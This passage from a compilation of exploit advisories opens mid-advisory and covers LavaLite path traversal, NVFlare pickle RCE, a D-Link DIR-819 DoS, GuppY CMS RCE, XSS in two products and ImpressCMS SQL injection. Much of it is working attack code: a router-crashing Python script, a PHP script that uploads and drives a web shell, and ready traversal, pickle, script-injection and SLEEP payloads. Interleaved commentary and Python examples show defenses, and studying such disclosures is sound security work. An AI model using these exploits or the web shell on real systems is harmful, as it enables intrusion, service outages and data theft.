Cookie: XSRF-TOKEN=eyJpdiI6IjNZbEZudjg0RXpFNEVLWHBUK0p6R1E9PSIsInZhbHVlIjoiNjFVbmZUVUJQWVdYWXJVOUVJRWVVdHN0UWtOQjJXZGRiS2N4T2lkM0VDeXFxcDRZdG1tRFVaQUk3dlhsWHRvOVQxVnQvbFhWRUJTbUllczh6MmhFUE84N1puNVFMSVFFeWdmRlJUYkdFRGdCakZ4eEJXeHllRTdFOFNPK0pLcnkiLCJtYWMiOiJhMDBlZWFiNDFlNzE2Yzc1ZjA2NzEzYzY2Y2U0ZDQ3NzdkMTI4OTY1NjA4OTNmNDE4ZDNmNWRkYzFkN2IzMWEwIiwidGFnIjoiIn0%3D; lavalite_session=eyJpdiI6ImxiWmVuV0xlU3ZtVWhLVW1Oc2duSEE9PSIsInZhbHVlIjoiUG5WMjhMNVppUkhST1Bta1FOd1VJUDR5ZW1lRU56bXpDTnpaVzkrUHFzQzJpKzE4YlFuNEQ2RnNlKzM2Tkg0Y2VZMExCRTBUUnRQajlpTmJCUXJjT3ZETzV6OVZveURuaTFHOHdoN3pneUR3NGhQc09OUjdKb0VreFV1Y0tuOTgiLCJtYWMiOiJlMTdlMTAyZTQ3MmMyMjZlMWE5MTkwMzc0NTU2OTFkOTlmOTM4MGVlZDE4NWU4MGNkZGM4OTllMTRmYTE3MGM1IiwidGFnIjoiJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmZXRjJTJmcGFzc3dkIn0%3d
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/cms-master/website/public/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+]Response:
```html
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/manifest.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/vendor.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/app.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/main.js"></script>
<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/theme.js"></script>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite)

## Proof and Exploit:
[href](https://streamable.com/nis1hg)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
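The payload above combines directory traversal with a NUL byte, so the tail of the cookie still looks like a normal token while the file name seen by a C-level open() ends at the NUL. The following added example is not Lavalite's code or the advisory author's; it shows how a naive join resolves that cookie value to /etc/passwd and the checks (NUL rejection, absolute-path rejection, normalisation followed by a containment test) a handler needs before it opens a file named by user input. The base directory and the single cookie-decoding step are assumptions.

```python
import posixpath
import urllib.parse

# Hypothetical storage root; the directory Lavalite actually reads from is not
# given in the advisory.
BASE_DIR = "/var/www/lavalite/storage"

# Constructed from the advisory's cookie: traversal, a NUL byte, then the start
# of the genuine (encrypted) token so the tail still looks like a cookie value.
ADVISORY_PAYLOAD = "../" * 16 + "etc/passwd\x00eyJpdiI6InhwNlhibUc0"


def naive_resolve(base, user_path):
    """What a handler effectively does when it joins the cookie value onto a
    directory and opens the result: '..' walks out of base and the NUL byte
    truncates the name once it reaches a C string API."""
    joined = posixpath.normpath(posixpath.join(base, user_path))
    return joined.split("\x00", 1)[0]   # emulate C string truncation at NUL


def safe_resolve(base, user_path):
    """Reject NUL bytes and absolute paths, normalise, then require the result
    to stay under base. Raises ValueError with the reason."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if user_path.startswith("/"):
        raise ValueError("absolute path not allowed")
    base = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base, user_path))
    # commonpath compares whole components, so /storage2/x does not pass as
    # being under /storage by string prefix.
    if posixpath.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory")
    # For real files, additionally resolve symlinks (os.path.realpath) before
    # the containment check; normpath alone never consults the filesystem.
    return target


def resolve_from_cookie(raw_cookie):
    """Percent-decode exactly once (as the server does) and then check.
    Returns 'ok:<path>' or 'rejected:<reason>'."""
    try:
        return "ok:" + safe_resolve(BASE_DIR, urllib.parse.unquote(raw_cookie))
    except ValueError as exc:
        return "rejected:" + str(exc)


if __name__ == "__main__":
    print(naive_resolve(BASE_DIR, ADVISORY_PAYLOAD))
    print(resolve_from_cookie(ADVISORY_PAYLOAD))
```

The order matters: decode once, then normalise, then test containment on the normalised result. Testing the raw string for "../" is defeated by encodings such as the %2e%2e%2f form visible in the lavalite_session cookie above.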
20. # Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
# Exploit Author: Elias Hohl
# Google Dork: N/A
# Date: 2022-06-21
# Vendor Homepage: https://www.nvidia.com
# Software Link: https://github.com/NVIDIA/NVFlare
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-34668

https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55

There is a Remote Code Execution vulnerability in https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated whether the server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server and ALL connected clients.

The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done; I considered line 568 in private/fed/server/fed_server.py the occurrence that is accessible with the least effort and thus used it in my PoC exploit.

The client generates a malicious data packet like this:

```python
aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))
```

REPLICATION

This example uses the server in poc mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials.)

This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server. Make sure to use Python 3.8; the nightly builds don't work with Python >= 3.9.

```shell
sudo apt update
sudo apt-get install python3-venv curl
python3 -m venv nvflare-env
source nvflare-env/bin/activate
python3 -m pip install -U pip
python3 -m pip install -U setuptools
python3 -m pip install torch torchvision tensorboard
git clone https://github.com/NVIDIA/NVFlare.git
cd NVFlare
git checkout 2.1.2
git apply nvflare-exploit-apply.txt   # note that this only modifies the client side code
python3 -m pip install .
cd ..
poc -n 2
mkdir -p poc/admin/transfer
cp -rf NVFlare/examples/* poc/admin/transfer
```

In four separate terminals, execute (after running `source nvflare-env/bin/activate` in each one):

```shell
./poc/server/startup/start.sh
./poc/site-1/startup/start.sh
./poc/site-2/startup/start.sh
./poc/admin/startup/fl_admin.sh localhost
```

In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:

```shell
nc -lvp 4321
```

In the admin console, execute:

```
check_status server
```

to verify both clients are connected. Then:

```
submit_job hello-pt-tb
```

It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is not data that the program can continue working with). You can also shut down netcat, which will result in "Connection refused" errors in the server tab.
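The mechanism above is pickle's ability to encode a call to any importable callable. The following added example, not part of the NVFlare code base or of Elias Hohl's PoC, builds such a payload with __reduce__ (setting an environment variable instead of running curl, so it is harmless and verifiable offline), loads it the unsafe way to show the call fires, and then loads it through a restricted Unpickler whose find_class only resolves an allow-list. The allow-list and the marker name are assumptions for the demonstration; for a real protocol the durable fix is to not feed untrusted bytes to pickle at all.

```python
import builtins
import io
import os
import pickle

# Constructed marker: the gadget sets this environment variable so the example
# can prove execution happened without touching the network.
MARKER = "NVFLARE_PICKLE_EXAMPLE"


class Gadget:
    """An object whose pickle, when loaded, calls builtins.exec(code).
    This is the shape of the malicious fl_context in the advisory; a real
    payload would run a command instead of setting a marker."""

    def __init__(self, code):
        self.code = code

    def __reduce__(self):
        # pickle stores (callable, args) and calls callable(*args) on load
        return (builtins.exec, (self.code,))


def generate_payload():
    return pickle.dumps(Gadget("import os; os.environ['%s'] = 'executed'" % MARKER))


def unsafe_load(blob):
    """What the vulnerable server does with client-supplied bytes."""
    return pickle.loads(blob)


# Allow-list of globals the message format legitimately needs (an assumption
# for this example; derive it from the real message schema in practice).
ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
           ("builtins", "frozenset"), ("builtins", "bytearray")}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is consulted for every GLOBAL/STACK_GLOBAL opcode, which is
    exactly where a gadget names its callable."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def safe_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def safe_roundtrip(obj):
    """Benign data still passes through the restricted loader."""
    return safe_load(pickle.dumps(obj))


def demo():
    """Returns (restricted loader verdict, marker before, marker after)."""
    os.environ.pop(MARKER, None)
    blob = generate_payload()
    try:
        safe_load(blob)
        restricted = "accepted"
    except pickle.UnpicklingError as exc:
        restricted = str(exc)
    before = os.environ.get(MARKER)
    unsafe_load(blob)           # the gadget fires here
    after = os.environ.get(MARKER)
    return restricted, before, after


if __name__ == "__main__":
    print(demo())
```

The restricted loader stops this gadget, but an allow-list is only as safe as its weakest entry: any listed callable that can be chained into arbitrary behaviour reopens the hole, which is why a non-code-carrying format is the better boundary for client data.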
21. # Exploit Title: DLink DIR 819 A1 - Denial of Service
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL: False
# [i] Request Timeout: 30s
# [i] Buffer Length: 19
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!

```python
#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print

# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32


# Class to exploit
class Exploit:
    def __init__(self, ip, is_ssl):
        """Initialize the constructor"""
        self.ip = ip
        self.is_ssl = is_ssl
        # oversized var:sys_Token value is what triggers the crash
        _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
        if self.is_ssl:
            self.payload = f"https://{_payload}"
        else:
            self.payload = f"http://{_payload}"

    def show(self):
        """Show the parameters"""
        print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")

    def run(self):
        """Run the exploit"""
        print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
        self.show()
        try:
            r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
            if "Internal Error" in r.text:
                print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
                print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
            else:
                print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
        except requests.exceptions.Timeout:
            # no answer within TIMEOUT: the web service stopped responding
            print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
        except Exception as e:
            print(f"Error occured as: {e}")


def main():
    """Main function to run"""
    parser = argparse.ArgumentParser(description="DLink DIR-819 Unauthenticated DoS")
    parser.add_argument('-i', '--ip', required=True, help="IP of the router")
    parser.add_argument('-s', '--ssl', required=False, action="store_true")
    opts = parser.parse_args()

    try:
        ip = socket.gethostbyname(opts.ip)
    except socket.error:
        print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
        return

    is_ssl = opts.ssl
    exploit = Exploit(ip, is_ssl)
    exploit.run()


if __name__ == '__main__':
    main()
```
22. # Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
# Date: Sep 30, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.freeguppy.org/
# Software Link: https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
# Version: 6.00.10
# Tested on: Linux

```php
#!/usr/bin/php
<?php
$username = "Admin2";   // Administrator username
$password = "rose1337"; // Administrator password

$options = getopt('u:c:');
if (!isset($options['u'], $options['c']))
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \n");

$target  = $options['u'];
$command = $options['c'];

// Administrator login
$cookie   = "cookie.txt";
$url      = "{$target}guppy/connect.php";
$postdata = "connect=on&uuser=old&pseudo=" . $username . "&uid=" . $password;

$curlObj = curl_init();
curl_setopt($curlObj, CURLOPT_URL, $url);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlObj, CURLOPT_HEADER, 1);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($curlObj, CURLOPT_POST, 1);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curlObj, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curlObj, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curlObj, CURLOPT_TIMEOUT, 30);
curl_setopt($curlObj, CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
$result = curl_exec($curlObj);

// uploading shell (multipart body built by hand to match the admin upload form)
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
$post = '------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="rep"

file
------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="ficup"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET["cmd"]); ?>
------WebKitFormBoundarygA1APFcUlkIaWal4--
';
$headers = array(
    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
    'Accept-Encoding: gzip, deflate',
    'Accept-Language: en-US,en;q=0.9'
);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curlObj, CURLOPT_URL, $url2);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
curl_setopt($curlObj, CURLOPT_POST, true);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curlObj, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curlObj, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curlObj, CURLOPT_TIMEOUT, 30);
curl_setopt($curlObj, CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
$data = curl_exec($curlObj);

// Executing the shell
$shell = "{$target}guppy/file/shell.php?cmd=" . $command;
curl_setopt($curlObj, CURLOPT_URL, $shell);
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curlObj, CURLOPT_HEADER, false);
curl_setopt($curlObj, CURLOPT_POST, false);
$exec_shell = curl_exec($curlObj);
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);

if ($code != 200) {
    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the credentials\n";
} else {
    print("\n");
    print($exec_shell);
}
curl_close($curlObj);
?>
```
23. # Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)
# Date: 2022-07-02
# Exploit Author: Ali Alipour
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 Pro x64 - XAMPP Server
# CVE : CVE-2022-35155

#Issue Detail:
The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

# Vulnerable page: /buspassms/download-pass.php
# Vulnerable Parameter: searchdata [ POST Data ]

#Request :
```http
POST /buspassms/download-pass.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3
Origin: https://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: https://127.0.0.1/buspassms/download-pass.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 25

searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=
```

#Response :
```http
HTTP/1.1 200 OK
Date: Fri, 01 Jul 2022 00:14:25 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8
X-Powered-By: PHP/7.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6425
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<title>Bus Pass Management System || Pass Page</title>
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba
...[SNIP]...
<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>
...[SNIP]...
```
24. # Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
# Version: 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664

Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1

Affected parameter in HTTP payload:
ReturnURL=<script>alert(document.cookie)</script>

Cordially,
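Items 23 and 24 are both reflections of a request parameter into an HTML response without output encoding. The following added example (not code from either product or advisory) renders item 23's probe string the vulnerable way and then with the encoding that fits three output contexts: HTML text, a double-quoted attribute such as a hidden ReturnURL field, and a JavaScript string literal. The markup and the has_script_tag() check are constructed for the demonstration.

```python
import html
import json

# The advisory's probe string (item 23) and an attribute-breaking probe in the
# style of item 24's ReturnURL payload (constructed).
PROBE_BODY = '966196cyne7<script>alert(1)</script>yhltm'
PROBE_ATTR = '"><script>alert(document.cookie)</script>'


def render_vulnerable(keyword):
    """Reflects the search term as-is, like download-pass.php does."""
    return '<h4>Result against "%s" keyword</h4>' % keyword


def render_safe(keyword):
    """Same markup with the value encoded for an HTML text context."""
    return '<h4>Result against "%s" keyword</h4>' % html.escape(keyword, quote=True)


def attr_safe(name, value):
    """Encoding for a double-quoted attribute value (e.g. a hidden ReturnURL
    field); quote=True turns the closing quote into &quot; as well."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def js_string_safe(value):
    """Encoding for a JavaScript string literal inside <script>: JSON yields a
    valid literal, and escaping < and > keeps the literal from closing the
    enclosing script element."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def has_script_tag(fragment):
    """Crude detector, used only to show which renderings are unsafe."""
    return "<script" in fragment.lower()


def demo():
    return {
        "vulnerable": has_script_tag(render_vulnerable(PROBE_BODY)),
        "safe_body": has_script_tag(render_safe(PROBE_BODY)),
        "safe_attr": has_script_tag(attr_safe("ReturnURL", PROBE_ATTR)),
        "safe_js": has_script_tag("var q = %s;" % js_string_safe(PROBE_BODY)),
    }


if __name__ == "__main__":
    print(demo())
```

Each context needs its own encoder; HTML-escaping a value and then dropping it into a script block, or into an unquoted attribute, is still exploitable.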
25. # Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26986
# Confirmed on release 1.4.3, this vulnerability is patched in version 1.4.4 and above.
# Vendor: https://www.impresscms.org
# Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3
###############################################
#Step1- Login with Admin Credentials
#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

```http
POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1
Host: 192.168.56.117
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701
Content-Length: 1011
Origin: http://192.168.56.117
Connection: close
Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1
Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3
Upgrade-Insecure-Requests: 1

-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="mimetypeid"

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="extension"

bin
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="types"

application/octet-stream
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="name"

Binary File/Linux Executable
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="icms_page_before_form"

http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="op"

addmimetype
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="modify_button"

Submit
-----------------------------40629177308912268471540748701--
```

Vulnerable Payload: 1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)   // time-based blind (query SLEEP)

Output:
```
web application technology: Apache 2.4.52, PHP 7.4.27
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [6]:
[*] impresscms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
```
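The payload above confirms injection only through the extra five seconds the request takes. The following added example, not from the advisory or from ImpressCMS, implements that timing oracle with two guards a practitioner would want (a median over several trials, and a second probe at double the delay that must scale too) and runs it against a constructed in-process stand-in for the endpoint that sleeps when a SLEEP(n) reaches the query. Against a real target the request() callable would wrap an HTTP call; the stand-in, the benign value and the thresholds are assumptions.

```python
import re
import statistics
import time


def make_fake_target(vulnerable, jitter=0.0):
    """Constructed stand-in for the mimetypeid handler. When vulnerable, a
    SLEEP(n) inside the value is 'executed' because the value was concatenated
    into SQL; otherwise it is inert data. jitter models a slow but safe host."""
    def request(value):
        start = time.perf_counter()
        m = re.search(r"SLEEP\((\d+(?:\.\d+)?)\)", value, re.IGNORECASE)
        if vulnerable and m:
            time.sleep(float(m.group(1)))
        if jitter:
            time.sleep(jitter)
        return time.perf_counter() - start
    return request


def sleep_payload(benign, seconds):
    """The advisory's payload shape with a configurable delay
    (MySQL's SLEEP accepts fractional seconds)."""
    return "%s AND (SELECT 1 FROM (SELECT(SLEEP(%s)))x)" % (benign, seconds)


def is_time_based_injectable(request, benign="1", delay=0.2, trials=3):
    """Timing oracle. request(value) must return the elapsed seconds.
    A single slow response is absorbed by the median; a one-off stall that
    happens to exceed `delay` is caught by requiring the 2x probe to scale."""
    baseline = statistics.median(request(benign) for _ in range(trials))
    once = statistics.median(request(sleep_payload(benign, delay)) for _ in range(trials))
    twice = statistics.median(request(sleep_payload(benign, 2 * delay)) for _ in range(trials))
    # 0.9 tolerates scheduler imprecision; sleep() never returns early, so a
    # truly injected delay always clears it
    return bool(once - baseline >= 0.9 * delay and twice - baseline >= 1.8 * delay)


if __name__ == "__main__":
    print("vulnerable:", is_time_based_injectable(make_fake_target(True)))
    print("patched:   ", is_time_based_injectable(make_fake_target(False, jitter=0.05)))
```

Nine requests per decision at 0.2 s is about two seconds of wall time; on a real target raise `delay` until it clearly exceeds the target's normal response variance, since the oracle cannot distinguish injected delay from congestion any other way.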